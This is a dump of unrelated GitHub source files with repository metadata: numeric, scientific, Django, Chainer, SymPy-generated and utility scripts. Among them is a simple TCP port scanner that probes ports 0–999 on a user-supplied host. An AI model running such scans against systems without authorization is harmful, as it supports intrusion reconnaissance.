65e893cd076a735f16f7fe5a29f4a839759724bc | 8dc333b7823c2cc5f4bb4adb75da37dcab06495f | /Section1.py | f0b657a08e18c2e71c97fe025deaf7856ec5a962 | [] | no_license | Mud-Fire/Math_Homework | cdb3c7729d7799a4ceeed2b506a239d305d5a608 | 119c26ab4c544e7652ac449661d2a39cd8b79480 | refs/heads/master | 2021-05-07T15:03:10.286846 | 2017-11-08T11:44:11 | 2017-11-08T11:44:11 | 109,968,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 999 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Oct 12 12:53:13 2017
@author: zb
"""
# Accumulates the series sum_{n=2..N} 1/(n^2 - 1) in ascending and in
# descending order of n and compares both with the closed-form telescoping
# value 0.5*(1.5 - 1/N - 1/(N+1)) - presumably to illustrate how summation
# order affects floating-point round-off.
# Read the number of terms N to use.
strN = input("Please enter an integer greater than 2:")
countN = int(strN)
# Closed-form (exact) value of the partial sum.
sumExact = 0.5 * (1.5-1/countN - 1/(countN+1))
# Accumulator for summing with n running from small to large.
sumOrder = 0
# Accumulator for summing with n running from large to small.
sumReOrder = 0
# Initialize the loop indices for both directions.
countNOrder = 2
countNReOrder = countN
if countN > 1:
    # Accumulate the terms in both orders simultaneously.
    while countNOrder <= countN:
        print(countNOrder,countNReOrder)
        sumOrder += 1/(countNOrder**2-1)
        sumReOrder += 1/(countNReOrder**2-1)
        countNOrder += 1
        countNReOrder -= 1
    # Print the results for comparison.
    print("===========result==================")
    print("Order summation %f"%sumOrder)
    print("Reverse order summation %f"%sumReOrder)
    print("Exact Value %f"%sumExact)
else:
    print("Please enter an integer greater than 2 ")
"noreply@github.com"
] | noreply@github.com |
10b624301331e971b74b1e971ab0f51ee36867b2 | 30bc1657a930cb90902a36c9e7e16e5d31ae2341 | /processDEM.py | dc3e54b92ab043e2dc05f0ffeec6c562a8882b1b | [] | no_license | Jubeku/DEM_processing | 26918dc620d216ebcd4ab9cbeb6763e87669c0fc | 0577dd5939ec4ea93bcada5faac6690feb8c0044 | refs/heads/master | 2020-08-26T16:59:03.106098 | 2019-10-29T16:01:04 | 2019-10-29T16:01:04 | 217,081,467 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,548 | py | #!/usr/bin/env python
"""
This script allows to repair, filter, and crop 2d DEM files.
Input parameters have to be specified in a file named 'input.txt'.
"""
import numpy as np
from modules.classTopo import Topo
from modules.m_PLOTS import plotDEM
def main():
    """Repair, filter, crop, interpolate, plot, and re-write a 2D DEM grid.

    Parameters are read from 'input.txt' (fixed line positions); the DEM is
    read from the file named there in Surfer DSAA-like format and the
    processed grid is written back in the same format.

    NOTE(review): np.float / np.int were removed in NumPy >= 1.24, so this
    requires an older NumPy - confirm the pinned version before upgrading.
    """
    ### INPUT
    # Read input parameters; odd line indices are value lines, the even
    # ones in between hold the labels shown in input.txt.
    with open('input.txt') as f:
        lines = f.readlines()
        k1, k2 = map(np.float,lines[1].split())
        E0out, E1out = map(np.float,lines[3].split())
        N0out, N1out = map(np.float,lines[5].split())
        dxout, dyout = map(np.float,lines[7].split())
        repair_bool = lines[ 9].replace('\n', '')
        fileID = lines[11].replace('\n', '')
        outID = lines[13].replace('\n', '')
    # Read DEM file: header carries grid size, extent and elevation range,
    # the actual grid starts at line 6.
    with open(fileID) as f:
        lines = f.readlines()
        Nx, Ny = map(np.int,lines[1].split())
        E0, E1 = map(np.float,lines[2].split())
        N0, N1 = map(np.float,lines[3].split())
        tmin,tmax = map(np.float,lines[4].split())
        topo = np.loadtxt(lines,skiprows=5)
    # Determine resolution of the DEM file from its extent and grid size.
    dx = (E1-E0)/(Nx-1)
    dy = (N1-N0)/(Ny-1)
    xi = np.arange(0, dx*Nx+dx, dx)
    yi = np.arange(0, dy*Ny+dy, dy)
    print('\n Grid dimension and resolution.')
    print('Nx: ', Nx, ', Ny: ', Ny)
    print('dx: ', dx, ', dy: ', dy)
    # Create an object with the Topo class (rows flipped so row 0 is south).
    topo = np.flipud(topo)
    topoC = Topo(topo, E0, N0, dx, dy, Nx, Ny)
    ### PROCESSING
    # Filtering: k1 == 0 is the sentinel for "no filtering" in input.txt.
    if k1 == 0.:
        print('\n No filtering.')
    else:
        topoC.filter( k1, k2 )
    # Cropping: skipped when the requested extent equals the input extent.
    if ( E0out == E0 and E1out == E1 and N0out == N0 and N1out == N1 ):
        print('\n No cropping.')
    else:
        topoC.crop( E0out, E1out, N0out, N1out )
    # Interpolating: skipped when the requested resolution is unchanged.
    if ( dxout == dx and dyout == dy ):
        print('\n No interpolation.')
    else:
        topoC.interpolate( dxout, dyout )
    # Repairing: input.txt carries the literal string 'True'/'False'.
    if repair_bool == 'True':
        topoC.repair()
    ### PLOTTING
    topoC.plot( 'Processed DEM' )
    ### WRITING
    # Write the processed grid back in DSAA format (header, min/max, data).
    with open(outID, 'w') as f:
        f.write('DSAA\n')
        f.write(' '+str(topoC.Nx)+' '+str(topoC.Ny)+'\n')
        f.write(' '+str(E0out)+' '+str(E1out)+'\n')
        f.write(' '+str(N0out)+' '+str(N1out)+'\n')
        np.savetxt(f,(np.min(topoC.topo),np.max(topoC.topo)),
            fmt=' %.1f',newline='')
        f.write('\n')
        np.savetxt(f, np.flipud(topoC.topo), fmt='%.3f', delimiter=' ')
if __name__ == "__main__":
    main()
| [
"julian.b.kuehnert@gmail.com"
] | julian.b.kuehnert@gmail.com |
65aad1bfe5b4d4756f2c8145c69dbdeaceda54b0 | 061fbd9e1d9bed1c88d5660211e9172401d5c108 | /venv/bin/easy_install | e3a56dc6a003370abaaa757ad43060e0d5c2f3fd | [] | no_license | PrachiJani13/mypythonproject | 5838302f1b9dd433dd9daf248f51d012072f7eaf | 3aa81e5d1175f4f369e49eb0faee046ee1668b1c | refs/heads/master | 2020-09-17T11:08:07.125757 | 2019-11-26T02:35:00 | 2019-11-26T02:35:00 | 224,083,299 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | #!/Users/prachijani/workspace/myprojectpython/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
    # setuptools console-script shim: strip a Windows launcher suffix
    # ("-script.pyw"/".exe") from argv[0], then hand off to easy_install.
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"prachi.jani@sjsu.edu"
] | prachi.jani@sjsu.edu | |
4db5502b3cb8b1723df8a7ac89467e02e213fda7 | d83f50302702d6bf46c266b8117514c6d2e5d863 | /counting-bits.py | f875bfed4d8a2d111f435b9c52cfced316a0c179 | [] | no_license | sfdye/leetcode | 19764a6bdb82de114a2c82986864b1b2210c6d90 | afc686acdda4168f4384e13fb730e17f4bdcd553 | refs/heads/master | 2020-03-20T07:58:52.128062 | 2019-05-05T08:10:41 | 2019-05-05T08:10:41 | 137,295,892 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 250 | py | class Solution:
def countBits(self, num):
"""
:type num: int
:rtype: List[int]
"""
ones = [0] * (num + 1)
for i in range(1, num + 1):
ones[i] = ones[i & (i - 1)] + 1
return ones
| [
"tsfdye@gmail.com"
] | tsfdye@gmail.com |
d0e81ba6dd79dc29f6b5cd9958451e5b589b5712 | 66c723d0137c0de9fdfc4a90d3405a8b3c60a7bd | /n_step_lstm/n_step_lstm.py | cc632b6a6ca0f68a32b0e7c8f828d8f30373bd32 | [] | no_license | afcarl/test-chainer-performance | 5ccb1d451791dd96633a1bb0f7e9438688f006ad | e0802e8421f4a07b839c44ceb90cfdf188ec4b84 | refs/heads/master | 2020-03-16T11:27:36.202733 | 2017-02-21T07:21:45 | 2017-02-21T07:21:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,796 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import chainer
import numpy as np
# 長さ順にソートしておく
x1 = chainer.Variable(np.array([0, 1, 2, 3, 4], dtype=np.int32))
x2 = chainer.Variable(np.array([4, 5, 6], dtype=np.int32))
x3 = chainer.Variable(np.array([4, 5], dtype=np.int32))
x_data = [x1, x2, x3]
batchsize = len(x_data)
x_dataset = chainer.functions.transpose_sequence(x_data)
# Auto-encoderの場合
y_data = x_data[:]
y_dataset = chainer.functions.transpose_sequence(y_data)
vocab_size = 2000
n_units = 200
embedding_size = 200
embID = chainer.links.EmbedID(vocab_size, embedding_size)
embID_decoder = chainer.links.EmbedID(vocab_size, embedding_size)
# lstm = chainer.links.LSTM(in_size=10, out_size=10)
encoder_lstm = chainer.links.StatelessLSTM(in_size=embedding_size, out_size=n_units)
decoder_lstm = chainer.links.StatelessLSTM(in_size=embedding_size, out_size=n_units)
output_layer = chainer.links.Linear(n_units, vocab_size)
x_len = len(x_dataset[0])
# c, h は初期化するべき
c = chainer.Variable(np.zeros((x_len, n_units), dtype=np.float32))
h = chainer.Variable(np.zeros((x_len, n_units), dtype=np.float32))
h_list = []
for i, x in enumerate(x_dataset):
print "-" * 10
x = embID(x)
x_len = x.data.shape[0]
h_len = h.data.shape[0]
print "x_len:", x_len
print "h_len:", h_len
if x_len < h_len:
h, h_stop = chainer.functions.split_axis(h, [x_len], axis=0)
c, c_stop = chainer.functions.split_axis(c, [x_len], axis=0)
# 処理済みのhをリストに追加
h_list.append(h_stop)
print "h:", h.data.shape
print "c:", c.data.shape
c, h = encoder_lstm(c, h, x)
# print h.data
h_list.append(h)
# appendの順番的にリバースしておいた方が自然?
h_list.reverse()
h_encoded = chainer.functions.concat(h_list, axis=0)
print h_encoded.data.shape
# print h_encoded.data
def _make_tag(_batchsize, tag=0):
shape = (_batchsize,)
return np.full(shape, tag, dtype=np.int32)
x_len = len(x_dataset[0])
c = chainer.Variable(np.zeros((x_len, n_units), dtype=np.float32))
# h = chainer.Variable(np.zeros((x_len, out_size), dtype=np.float32))
h = h_encoded
start_tag = _make_tag(batchsize, tag=0)
start_tag = [chainer.Variable(start_tag)]
end_tag = _make_tag(batchsize, tag=1)
end_tag = [chainer.Variable(end_tag)]
# y = start_tag
decode_start_idx = 0
# decode
# y_datasetは<s>で始まる前提にする?
# ミニバッチ化する時に<eos>の扱いが面倒なので、データの前処理のときに
# [0, 1, 2, 3, <eos>]
# [0, 3, <eos>]
# [0, 1, 2, <eos>]
# とするほうが良さげ
y_dataset = list(y_dataset)
# for target in y_dataset:
for y, t in zip(start_tag + y_dataset[:-1], y_dataset[1:]):
print "-" * 10
y_embedding = embID(y)
# y_len = y_embedding.data.shape[0]
y_len = y_embedding.data.shape[0]
# t_len = t.data.shape[0]
h_len = h.data.shape[0]
target_len = t.data.shape[0]
# print t
# print t_len
print "y_len:", y_len
print "target_len:", target_len
if target_len < h_len:
h, h_stop = chainer.functions.split_axis(h, [target_len], axis=0)
c, c_stop = chainer.functions.split_axis(c, [target_len], axis=0)
if target_len < y_len:
y_embedding, _stop_y_embedding = chainer.functions.split_axis(y_embedding, [target_len], axis=0)
print "y_embedding:", y_embedding.data.shape
print "h:", h.data.shape
c, h = encoder_lstm(c, h, y_embedding)
predict = output_layer(h)
print "predict:", predict.data.shape
print h
# x_len = x.data.shape[0]
# h_len = h.data.shape[0]
# embID_decoder()
# loss = functions.softmax_cross_entropy(y, t)
# x = embID(x)
# x_len = x.data.shape[0]
# h_len = h.data.shape[0]
| [
"nanigashi03@gmail.com"
] | nanigashi03@gmail.com |
e98c9e6e4e8e98f0eb86148a6604600fbb0f969e | f445450ac693b466ca20b42f1ac82071d32dd991 | /generated_tempdir_2019_09_15_163300/generated_part002645.py | 26c00d84fbe342c060edabef02fe3c69582a4427 | [] | no_license | Upabjojr/rubi_generated | 76e43cbafe70b4e1516fb761cabd9e5257691374 | cd35e9e51722b04fb159ada3d5811d62a423e429 | refs/heads/master | 2020-07-25T17:26:19.227918 | 2019-09-15T15:41:48 | 2019-09-15T15:41:48 | 208,357,412 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,821 | py | from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher122210(CommutativeMatcher):
    """Auto-generated matchpy commutative matcher (SymPy Rubi rule machinery).

    Matches commutative Mul arguments against the pattern table below.
    Do not edit by hand - regenerate instead.
    """
    _instance = None
    patterns = {
        0: (0, Multiset({}), [
            (VariableWithCount('i2.2.1.2.1.0', 1, 1, None), Mul),
            (VariableWithCount('i2.2.1.2.1.0_1', 1, 1, S(1)), Mul)
        ]),
        1: (1, Multiset({0: 1}), [
            (VariableWithCount('i2.2.1.2.1.0', 1, 1, S(1)), Mul)
        ])
    }
    subjects = {}
    subjects_by_id = {}
    bipartite = BipartiteGraph()
    associative = Mul
    max_optional_count = 1
    anonymous_patterns = set()
    def __init__(self):
        self.add_subject(None)
    @staticmethod
    def get():
        # Lazily created process-wide singleton instance.
        if CommutativeMatcher122210._instance is None:
            CommutativeMatcher122210._instance = CommutativeMatcher122210()
        return CommutativeMatcher122210._instance
    @staticmethod
    def get_match_iter(subject):
        # Generated decision tree: each "State" comment marks a node of the
        # matching automaton emitted by matchpy's code generator.
        subjects = deque([subject]) if subject is not None else deque()
        subst0 = Substitution()
        # State 122209
        if len(subjects) >= 1 and isinstance(subjects[0], Pow):
            tmp1 = subjects.popleft()
            subjects2 = deque(tmp1._args)
            # State 123779
            if len(subjects2) >= 1:
                tmp3 = subjects2.popleft()
                subst1 = Substitution(subst0)
                try:
                    subst1.try_add_variable('i2.2.1.2.1.1', tmp3)
                except ValueError:
                    pass
                else:
                    pass
                    # State 123780
                    if len(subjects2) >= 1:
                        tmp5 = subjects2.popleft()
                        subst2 = Substitution(subst1)
                        try:
                            subst2.try_add_variable('i2.2.1.2.1.2', tmp5)
                        except ValueError:
                            pass
                        else:
                            pass
                            # State 123781
                            if len(subjects2) == 0:
                                pass
                                # State 123782
                                if len(subjects) == 0:
                                    pass
                                    # 0: x**n
                                    yield 0, subst2
                        subjects2.appendleft(tmp5)
                subjects2.appendleft(tmp3)
            subjects.appendleft(tmp1)
        return
        yield
from collections import deque | [
"franz.bonazzi@gmail.com"
] | franz.bonazzi@gmail.com |
18993d6a9980af00334c5b5db42135f52700e93a | 925f9291b8d98468f17ff8b8e5d54006193ddcd0 | /bookstore/urls.py | 36c6e936740001e428aba08ea0fa667cda50af5b | [] | no_license | hamzabelatra/DjangoBookStore | 7c058469acef22228463580f6c343cb591e626eb | 5cbffd37bd093a497d18c131b532256cee19b2d9 | refs/heads/master | 2023-08-09T11:10:11.895251 | 2021-09-20T20:18:50 | 2021-09-20T20:18:50 | 408,589,362 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 751 | py | """bookstore URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
    # Django admin site; app URL includes can be added here as the project grows.
    path('admin/', admin.site.urls),
]
| [
"hamzabelatra1@gmail.com"
] | hamzabelatra1@gmail.com |
ab8659e73eca39e44cbcc460da6ce495f4024307 | 1b8ffe50059dff352206da41d40a6cab12744864 | /PortScanner.py | cc6cd65670f145625b93d510c0c9d7f1efcc60bc | [] | no_license | XD-Coffin/PortScanner | f4bca444a98115aee5eaa6e11e7b77f23a069ab7 | 299e3947ee0fc84c3af80370498fe357f1aabe60 | refs/heads/master | 2022-12-20T08:58:47.745548 | 2020-10-20T00:41:31 | 2020-10-20T00:41:31 | 305,545,491 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 754 | py | import socket
import sys
import os
import time
# Switch the Windows console text color to green (ignored on other platforms).
os.system("color a")
host = input("Enter the host's ip address you want to scan: ")
print("""
1. Specific Port
2. All 1000 Ports
""")
option = int(input("Enter the option you want to use: "))

def _is_open(target, port):
    """Return True when a TCP connection to (target, port) succeeds.

    A fresh socket is used for every probe: the original script reused one
    socket for all connect_ex() calls, but a socket cannot connect again
    after a previous attempt, so every port after the first was reported
    closed regardless of its real state.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        return sock.connect_ex((target, port)) == 0

if option == 1:
    port = int(input("Enter the port: "))
    if not _is_open(host, port):
        print(f"Port {port} is closed")
    else:
        print(f"{port} Port is open")
elif option == 2:
    # Probe ports 0-999; the for-loop advances `port` itself (the original
    # had a redundant `port += 1` in the body, removed here).
    for port in range(1000):
        if not _is_open(host, port):
            print(f'Port {port} is closed')
        else:
            print(f"{port} Port is open")
time.sleep(6)
sys.exit()
| [
"np01nt4a190175@islingtoncollege.edu.np"
] | np01nt4a190175@islingtoncollege.edu.np |
f6c9eb2dd9064e19a427efac7876905fb88841f9 | 9093f2a305bba661ae671134648a251612226c83 | /manage.py | aaa2b9aa399e90031f7f7112abf86277daa20ef1 | [] | no_license | Regaron/ECommerce | 7b631290f0d709f0d9c52663f705ee0db9e6564e | 55c70e4a9a24192f80906f1d6893fc3dc96e2355 | refs/heads/master | 2020-03-25T04:35:31.878809 | 2019-11-16T14:07:53 | 2019-11-16T14:07:53 | 141,599,613 | 0 | 0 | null | 2018-07-26T04:35:43 | 2018-07-19T15:38:22 | Python | UTF-8 | Python | false | false | 541 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
    # Standard Django management entry point (django-admin startproject
    # boilerplate): point Django at this project's settings, then dispatch
    # the command-line arguments (runserver, migrate, ...).
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ECommerce.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    execute_from_command_line(sys.argv)
| [
"sujanbudhathoki123@gmail.com"
] | sujanbudhathoki123@gmail.com |
7d1d73ca2a8cb31e859f930a208e08029fffaba2 | 650e8c0eef602308e61a6d3c9476bb550c3e4a8c | /StartingOutWithPy/Chapter 02/ProgrammingExercises/09_C_to_F_temp_converter.py | af802349730447421820e6c8bf6b9b99b15d352f | [] | no_license | cosmos512/PyDevoir | 7895d21d70c94074cacab79ca55dc1fca00bd514 | 3eabad164a62c7ef7919e7847033e67e7b0644a3 | refs/heads/master | 2021-01-23T18:59:21.136075 | 2014-08-03T20:10:25 | 2014-08-03T20:10:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | # Write a program that converts Celsius temperatures to Fahrenheit temperatures.
# The formula is as follows:
# 9
# F = - C + 32
# 5
# The program should ask the user to enter a temperature in Celsius, and then
# display the temperature converted to Fahrenheit.
C = float(input('What is the Celsius temperature you saw?: '))
F = 9 / 5 * C + 32
print("Well, then that means it's", format(F, '.1f'), "degrees Fahrenheit.")
| [
"lunlunart@gmail.com"
] | lunlunart@gmail.com |
25859d62514ea506faa2e5384810904d8205659b | 78560437a0cc6c1e34ab654c32f5fab465530aeb | /EstruturaSequencial/16_Casa_tintas.py | 33770d4450d1d1c267287eb062f08bf53000ce0c | [] | no_license | StefanOliveira/ExerciciosPython | bec15ab3fb0c10aebde1e2d8e5992fd9b77bb2c8 | f7b51276e2e2ed7bb4160615b49a5df24c50e248 | refs/heads/master | 2020-03-20T14:26:51.306691 | 2018-08-20T19:33:16 | 2018-08-20T19:33:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | nQtdMts = float(input('Informe a area em metros que será pintada: '))
# Each litre of paint covers 3 square metres.
nLitros = nQtdMts / 3.0
# Cans hold 18 L each; any leftover litres still require a whole extra can.
nLatas = int(nLitros / 18.0) + (1 if nLitros % 18 != 0 else 0)
print ('Você precisa de',nLatas,'latas de tinta')
print ('Total a pagar:',nLatas * 80)
| [
"noreply@github.com"
] | noreply@github.com |
bbf45532ab46317e7c548a735d5a2663e074b126 | e9263f1f1a780e831464626ffcc74a9eeb2b2f12 | /print_request.py | 6ea534ce1cc3bef70a40a813e279197625d05893 | [] | no_license | OPEOStudio/kraft_bootstrap | bd26bb9bdd187961b36a2a1753f325fe45515a06 | e5e0e07694cd792aa82107832714d3a90696e6ac | refs/heads/master | 2020-04-06T18:57:23.106134 | 2019-01-16T10:05:12 | 2019-01-16T10:05:12 | 157,719,675 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,268 | py | import requests
import json
### PRINT THE REQUEST
# Debug helper: builds a requests.Request and prints its prepared form so you
# can verify that all the intended request elements are being sent.
# DOESN'T WORK FOR NOW (original author's note)
def print_r(string, url, data, headers, params):
    """Build a request and pretty-print its prepared form.

    `string` is the HTTP method name (e.g. "POST"); the remaining arguments
    are forwarded to requests.Request unchanged.
    """
    # Put headers/params back into dictionaries if they arrive serialized:
    #print("headers: "+headers) ## Allowed me to test that headers is well a dict right now
    #headers_dict = json.loads(headers)
    #params_dict = json.loads(params)
    print("headers : "+str(headers))
    # Define the Request object.
    request = requests.Request(string, url, data = data, headers = headers, params = params)
    print("request: "+str(request))
    # Prepare the request (resolves params/headers/body into their final form).
    prepared = request.prepare()
    # Hand off to the printing step.
    pretty_print_POST(prepared)
def pretty_print_POST(request):
    """Dump a prepared request to stdout in a readable form.

    Expects an object with .method, .url, .headers (mapping) and .body,
    e.g. a requests.PreparedRequest. The output is a pretty-printed
    approximation and may differ from the bytes actually sent on the wire.
    """
    print(" ")
    request_line = request.method + ' ' + request.url
    header_lines = '\n'.join('{}: {}'.format(name, value)
                             for name, value in request.headers.items())
    print('{}\n{}\n{}\n\n{}'.format('-----------START-----------',
                                    request_line, header_lines, request.body))
| [
"36651512+musiquarc@users.noreply.github.com"
] | 36651512+musiquarc@users.noreply.github.com |
e74628558b410dabd6460047e5def4308c79a579 | d153be2b35d7274bfadc305af19ee5f6827efb07 | /captain_console/cart/migrations/0004_auto_20200514_2204.py | 3ecf0942392a7f84050e3aac1fef658200e62178 | [] | no_license | bjorgvin16/verklegt2 | 1796ee6b4e8e4a6ab8fe5f1776109d56e4777d05 | f833243c5f48e54817fe105f33ce216ec66c3c6c | refs/heads/master | 2022-07-26T03:04:14.805467 | 2020-05-15T23:08:53 | 2020-05-15T23:08:53 | 259,272,640 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 481 | py | # Generated by Django 3.0.6 on 2020-05-14 22:04
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: removes Order.quantity and adds
    Cart.quantity (IntegerField, default 1). Applied migrations should not
    be hand-edited.
    """
    dependencies = [
        ('cart', '0003_order_orderdate'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='order',
            name='quantity',
        ),
        migrations.AddField(
            model_name='cart',
            name='quantity',
            field=models.IntegerField(default=1),
        ),
    ]
| [
"margriette123@gmail.com"
] | margriette123@gmail.com |
a49e2c4eeddaf540dfd5ba698a9805c8b952a483 | c9f3ecbf78f890ff598591e6bf326b79f7b22608 | /Python/Chapter 1/ex32.py | 84d63a023dcbb5ab1aa4d9b366425ad84de0ea83 | [] | no_license | bomcon123456/DSA_Learning | f17ceacadaf0398e233c9740d9d24ee5fc76fa69 | d943ec1aa7315d0e34fd3505ccb5a62a415ecf73 | refs/heads/master | 2020-06-25T08:58:50.280816 | 2020-01-02T02:36:17 | 2020-01-02T02:36:17 | 199,265,954 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 535 | py | def ex32():
c = ""
res = 0
plusNext = False
while True:
c = input()
arr = c.split(" ")
if len(arr) == 1:
if c == "+":
res = res
plusNext = True
elif c == "=":
print(res)
return res
else:
if plusNext:
res += float(c)
else:
res = res * 10 + float(c)
else:
raise IOError("Unsupported operations")
ex32()
| [
"termanteus@aos-iMac.local"
] | termanteus@aos-iMac.local |
a160ac123f2a744d1d10d17cfc24c6bec46d13dd | a5bd2739e15716de801d621e6a756c943cb937e4 | /states/base/_grains/reboot_required.py | f8aa8cad002ccccebb1d1d44b3ecc72277a3fcf3 | [] | no_license | ashmckenzie/salt | 00be6ec559769c7aff84f3ed97eb2162ee6bfcc4 | dc67b06e99ad61f203752867ce54dc31a48b9800 | refs/heads/master | 2020-12-23T11:16:58.096353 | 2017-06-21T00:28:26 | 2017-06-21T00:28:26 | 33,473,549 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 168 | py | # -*- coding: utf-8 -*-
import os.path
def reboot_required():
    # Salt grain: True when the /var/run/reboot-required marker file exists
    # (created by Debian/Ubuntu's update machinery when a reboot is needed).
    return {'reboot_required': os.path.isfile('/var/run/reboot-required')}
| [
"ash@the-rebellion.net"
] | ash@the-rebellion.net |
4f0d5c22413bdaacf869bf9cbd12d47bcc73f375 | 1dc753d68b234b10193962f58d306bd91957eb6d | /college/college/doctype/student_achievements/student_achievements.py | 66884338ed30206d53469c0ed0ba413e759ab9c7 | [
"MIT"
] | permissive | harshith187/college | e8612134e47c48ad721840f684362f7348e9bad4 | d9ae21734dcde70397aead827e57fbbdcdeb98c9 | refs/heads/master | 2020-07-20T12:36:27.601134 | 2020-05-25T13:53:57 | 2020-05-25T13:53:57 | 206,641,495 | 0 | 4 | NOASSERTION | 2020-05-25T15:05:16 | 2019-09-05T19:27:37 | Python | UTF-8 | Python | false | false | 266 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2019, mvit ise and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
from frappe.model.document import Document
class StudentAchievements(Document):
pass
| [
"frappe@ubuntu.vm"
] | frappe@ubuntu.vm |
1253ef78db264c7b83bead8bbc79f13fb57fd0b9 | 2bdf073b9788c446342643296c6b68c353b0a5c6 | /rareapi/views/tag.py | eab977834ef18b2af0bd99de48da0dfffcf18616 | [] | no_license | nss-day-cohort-50/rare-api-rowdy-roadtrippers | f07819362a97b0b02d945c9e932ecf18375c01ea | 25122375b4f07b738a65c4bac21ff300379d831b | refs/heads/main | 2023-09-03T12:57:04.390337 | 2021-11-18T17:34:05 | 2021-11-18T17:34:05 | 428,313,351 | 0 | 0 | null | 2021-11-18T17:34:06 | 2021-11-15T15:14:38 | Python | UTF-8 | Python | false | false | 1,501 | py | from django.core.exceptions import ValidationError
from rest_framework import status
from django.http import HttpResponseServerError
from rest_framework.viewsets import ViewSet
from rest_framework.response import Response
from rest_framework import serializers
from rareapi.models import Tag
class TagView(ViewSet):
    """ViewSet exposing create/list/destroy endpoints for Tag objects."""

    def create(self, request):
        """POST a new tag; respond 400 with the reason when validation fails.

        NOTE(review): ex.message only exists for single-message Django
        ValidationErrors - confirm multi-error cases before relying on it.
        """
        try:
            tag = Tag.objects.create(
                label = request.data["label"]
            )
            serializer = TagSerializer(tag, context={"request": request})
            return Response(serializer.data)
        except ValidationError as ex:
            return Response({"reason": ex.message}, status=status.HTTP_400_BAD_REQUEST)

    def list(self, request):
        """GET all tags."""
        tag = Tag.objects.all()
        serializer = TagSerializer(
            tag, many=True, context={'request': request})
        return Response(serializer.data)

    def destroy(self, request, pk=None):
        """DELETE one tag: 204 on success, 404 when missing, 500 otherwise."""
        try:
            tag = Tag.objects.get(pk=pk)
            tag.delete()
            return Response({}, status=status.HTTP_204_NO_CONTENT)
        # Fixed: this previously read `tag.DoesNotExist`, but `tag` is unbound
        # when objects.get() raises, so the handler itself blew up and clients
        # got a 500 instead of a 404. The exception lives on the model class.
        except Tag.DoesNotExist as ex:
            return Response({'message': ex.args[0]}, status=status.HTTP_404_NOT_FOUND)
        except Exception as ex:
            return Response({'message': ex.args[0]}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
class TagSerializer(serializers.ModelSerializer):
    """Serializes Tag instances as {id, label} JSON."""
    class Meta:
        model = Tag
        fields = ('id', 'label')
        # NOTE(review): depth only affects relational fields; with just 'id'
        # and 'label' this appears to be a no-op - confirm before removing.
        depth = 1
| [
"matthew.singler@gmail.com"
] | matthew.singler@gmail.com |
7725728c4396eab46cc3164cd5889e7d901b4a5f | 5a760a0ff2a1655e3fbddd621a181378ea092fcc | /StarWebBuilder/timeout.py | 0586ada83fff4c9164333ee84c45b29f1a458022 | [
"MIT"
] | permissive | taschetto/sublimeSettings | 7f8292737b6f413718d7e076b9bd08e0ef8a297d | 64bcb568c240b851efc914b102e0c57e1553d8c5 | refs/heads/master | 2020-03-26T05:45:59.888806 | 2016-09-14T15:34:11 | 2016-09-14T15:35:07 | 26,015,128 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 550 | py | from functools import wraps
import errno
import os
import signal
class TimeoutError(Exception):
    """Raised by the @timeout decorator when a call exceeds its time limit.

    NOTE(review): shadows the built-in TimeoutError on Python 3 - consider
    renaming if callers ever need to distinguish the two.
    """
    pass
def timeout(seconds=10, error_message=os.strerror(errno.ETIME)):
    """Decorator factory: abort the wrapped call with TimeoutError after `seconds`.

    Relies on SIGALRM, so it only works on Unix and in the main thread. The
    pending alarm is always cancelled, whether the call returns or raises.
    """
    def decorator(func):
        def _on_alarm(signum, frame):
            raise TimeoutError(error_message)
        @wraps(func)
        def wrapper(*args, **kwargs):
            signal.signal(signal.SIGALRM, _on_alarm)
            signal.alarm(seconds)
            try:
                return func(*args, **kwargs)
            finally:
                signal.alarm(0)
        return wrapper
    return decorator
"gtaschetto@gmail.com"
] | gtaschetto@gmail.com |
